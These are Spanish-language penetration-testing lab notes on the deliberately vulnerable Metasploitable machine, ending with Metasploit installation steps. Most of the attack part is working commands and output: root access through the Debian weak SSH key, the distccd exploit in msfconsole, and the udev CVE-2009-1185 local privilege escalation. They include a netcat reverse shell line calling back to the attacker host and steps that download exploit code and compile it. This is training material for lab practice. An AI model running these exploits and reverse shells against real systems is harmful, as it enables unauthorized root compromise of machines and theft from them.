ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 fila)
# wget http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
# tar xvjf debian_ssh_rsa_2048_x86.tar.bz2
# cd rsa/2048
# grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.50
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server
root@metasploitable:~# whoami
root

# Metasploitable (distccd + udev)

Introducción

Metasploitable virtual machine (01, 02, 03, 04)
udev < 141 Local Privilege Escalation Exploit

Ejecución
# msfconsole
msf > nmap -sV -O -p 1-65535 192.168.1.50
[*] exec: nmap -sV -O -p 1-65535 192.168.1.50

Not shown: 65523 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  netbios-ssn 
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  http
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > search distccd
msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
msf exploit(distcc_exec) > set rhost 192.168.1.50
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set payload cmd/unix/bind_ruby
# nc -vl 1234
msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.100:56362 -> 192.168.1.50:4444)

uname -a
Linux metasploitable 2.6.24-16-server
whoami
daemon
wget http://www.exploit-db.com/download/8572
mv index.html cve-2009-1185.c
gcc -o cve-2009-1185 cve-2009-1185.c
echo "#!/bin/sh\n/bin/netcat -e /bin/sh 192.168.1.100 1234" > /tmp/run
ps axuf | grep udev | grep -v grep
root      2479  0.0  0.0   2104   708 ?        Ss  05:32   0:00 /sbin/udevd --daemon
./cve-2009-1185 2478 # =2479-1
# nc -vl 1234
Connection from 192.168.1.50 port 1234 [tcp/*] accepted
uname -a
Linux metasploitable 2.6.24-16-server
whoami
root

# Instalar metasploit

Introducción

Instalación en Ubuntu

Instalación de metasploit
# cat /etc/lsb-release | grep DESC
DISTRIB_DESCRIPTION="Ubuntu 10.04.1 LTS"
# cd
# apt-get install ruby libopenssl-ruby libyaml-ruby \
libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
# apt-get install subversion
# apt-get install build-essential ruby-dev libpcap-dev
# mkdir metasploit
# cd metasploit
# wget http://updates.metasploit.com/data/releases/framework-3.5.1.tar.bz2
# tar xvjf framework-3.5.1.tar.bz2
# mkdir -p /opt/metasploit3
# cp -a msf3/ /opt/metasploit3/msf3
# ln -sf /opt/metasploit3/msf3/msf* /usr/local/bin/
# svn update /opt/metasploit3/msf3/
# cd ..
# rm -rf metasploit
Instalación de postgres
# apt-get install postgresql-8.4
# apt-get install rubygems libpq-dev
# gem install pg
# apt-get install libreadline-dev
# apt-get install libssl-dev
# apt-get install libpq5
# apt-get install ruby-dev
Configuración de postgres
# su postgres
$ createuser msf_user -P
Enter password for new role: 
Enter it again: 
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
$ createdb --owner=msf_user msf_database
Configuración de Metasploit
# cat > ~/.msf3/msfconsole.rc << eof
> db_driver postgresql
> db_connect msf_user:password@127.0.0.1:5432/msf_database
> db_workspace -a MiProyecto
> eof
Habilitar el módulo rack sockets
# cd /opt/metasploit3/msf3/external/pcaprub/
# ruby extconf.rb
# make && make install
Habilitar el módulo wifi
# cd  /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install